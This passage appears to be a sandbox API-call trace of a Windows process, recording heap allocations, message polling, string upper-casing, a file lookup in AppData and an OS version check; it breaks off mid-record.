[0199.484] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.484] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.485] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Ie7x9Fbl.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb606510, ftCreationTime.dwHighDateTime=0x1d4cfcf, ftLastAccessTime.dwLowDateTime=0xe1586be0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xe1586be0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x168c3, dwReserved0=0x9fb0039, dwReserved1=0x15d0c, cFileName="Ie7x9Fbl.m4a", cAlternateFileName="")) returned 0xaa59a0 [0199.485] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0199.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.486] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.486] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.486] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.486] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.486] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.487] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.487] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.487] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.487] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.487] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0199.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.488] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.488] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.488] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0199.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.489] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.490] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.490] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.490] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.491] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.491] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.492] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.493] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.494] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.495] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.495] HeapFree (in: 